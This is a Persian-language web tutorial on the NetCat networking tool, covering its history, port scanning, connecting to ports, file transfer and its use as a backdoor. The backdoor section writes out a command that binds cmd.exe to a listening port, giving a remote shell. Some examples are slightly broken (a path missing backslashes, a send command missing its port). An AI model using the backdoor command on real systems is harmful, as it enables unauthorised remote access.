NeT caD

 

                                        

                                                         

صفحه اصلي

کاربران

! یاهو

آموزش

دانلود

تماس با ما

 
 
 
 
 
 
 
 
 
 

  

       NeT caD
 

ميتوان گفت هيچ يک از حملات شبکه اي بدون نام بردن از NetCat کامل نخواهد بود. اين برنامه ميتواند هم براي مديران سيستم و هم براي مهاجمان مورد استفاده قرار بگيرد. NetCat در ابتدا توسط Hobbit نوشته شد و در اوايل سال 1996 منتشر شد که البته براي سيستم هاي Unixنوشته شده بود, و در سال 1998, Weld Pond نسخه اي براي ويندوز را ايجاد کرد.
NetCat مثل يک ابزار شبکه اي همه منظوره است که براي ارسال يا دريافت داده ها از هر پورت TCP يا UDP به هر پورت UDP ياTCP به کار ميرود. همچنين ميتوان به عنوان ,Port scanner Backdoor ,Port listener ,downloda, uploader و... استفاده کرد.
حال با چند مثال به بررسي چند کاربرد اين برنامه ميپردازيم.
Port scanning
براي اسکن کردن پورت هاي باز (پورت هاي در حالت listening) يک سيستم خط زير را
به کار ميبريم:
nc –v –w 2 –z [target] 10-100
در اينجا target نام يا IP سيستمي که مي خواهيم اسکن کنيم است.
سويچ -v اطلاعاتي درباره اتصال ميدهد.
سويچ -wزمان استفاده شده براي ايجاد يك اتصال را محدود ميكند.
سويچ-z نيز از ارسال هر گونه داده جلوگيري ميکند و باعث سريعتر شدن اسکن ميگردد.
در اين حالت nc تمام پورت هاي باز سيستم را که بين 1 تا 100 هستند اسکن ميکند و نام پورت هاي معروفي مثل 21 يا 23 که پورت هاي FTP و Telnet مي باشند را نيز نمايش ميدهد.
البته NetCat وسيله سريعي براي پورت اسکنينگ نيست و براي اينکار برنامه اي مانند Nmap بهتر عمل ميکند.
Connect to Port
براي اتصال به يک پورت از يک سيستم ميتوان از خط زير استفاده کرد:
nc –v –n [target] [port number]
با استفاده از سويچ –n NetCat فقط ادرس هايIP عددي را مي پذيرد.
از اين دستور ميتوان به جاي telnet در ويندوز استفاده کرد که هم باعث خوانا شدن نوشته ها ميشود و همچنين پايدارتر از telnet است.
Backdoor
يکي از کاربرد هاي ديگر nc . استفاده از ان به عنوان Backdoor است. براي اين کار خط زير را اجرا ميکنيم:
nc –L –p [port number] –d –e [cmd.exe]
سويچ –L nc را در حالت listen راه مي اندازد
سويچ-p شماره پورتي را که ميخواهيد به ان وصل شويد مشخص ميکند.
سويچ –d نتکت را در حالت جدا از کنسول اجرا ميکند.
سويچ –e برنامه اي را که شما مشخص کرده ايد اجرا ميکند.
در اينجا port number شماره پورت است که ميتواند هر پورتي باشد (پورت رزرو نشده) و شما ميخواهيد به ان پورت وصل شويد.
(Command prompt) cmd.exe هم برنامه اي است که پس از اتصال به nc روي آن پورت اجرا خواهد شد. در اين قسمت اگر برنامه اي که ميخواهيد پس از وصل شدن اجرا شود در Directory nc نباشد بايد نام درايو و directory آن را هم بنويسيد:
nc –L –p 5566 –d –e c:winntsystem32cmd.exe
در اين حالت nc روي پورت 5566 در حالت listening قرار ميگيرد و به محض برقراري ارتباط cmd.exe را روي اين پورت فعال ميکند.
File Transfering
از کاربردهاي ديگر اين برنامه انتقال فايل بين دو سيستم است. بسياري از شبکه ها جلوي FTP را ميگيرند يا اينکه به دليلي شما نميتوانيد از TFTP استفاده کنيد. ميتوان به وسيله nc فايل را با استفاده از پورت TCP و UDP منتقل کرد.
براي اين کار بايد nc را در حالت listen در سيستم مقصد راه انداخته و خروجي ان را به يک فايل منتقل کنيم. در سيستم مبدا نيز ان را در حالت client قرار ميدهيم تا به سيستم مقصد روي پورت مورد نظر وصل شود و فايل وروي را منتقل ميکنيم.
کامپيوتر مبدا:
client pc(recive file): nc –l –p [port] > [file]
کامپيوتر مقصد:
Srver pc(sending file): nc [client-IP] [port] < [file]
با به کار بردن سويچ –u فايل به صورت UDP انتقال ميابد.
براي مثال ميخواهيم فايل hack.htm را به کامپيوتري با IP 192.168.0.1 بفرستيم:
روي کامپيوتر مقصد اين خط را مينويسيم:
nc –l –p 5566 > hack.htm
پورت 5566 را به صورت دلخواه انتخاب کرده ايم.
روي کامپيوتر خود نيز اين خط را مينويسيم:
nc 192.168.0.1 < hack.htm
هميشه اول بايد nc را روي کامپيوتر مقصد اجرا کنيد

 



 

منبع : www.crouz.com

<<< Back

   

 
 
 
 
 
 
 
 
 
 

 

 

 

 

 

 

 

 

 

 

كليه حقوق , مربوط به سايت وحيد آنلاين مي باشد. و در هنگام استفاده از مقاله , عكس , برنامه و.. از اين سايت ذكر منبع الزامي است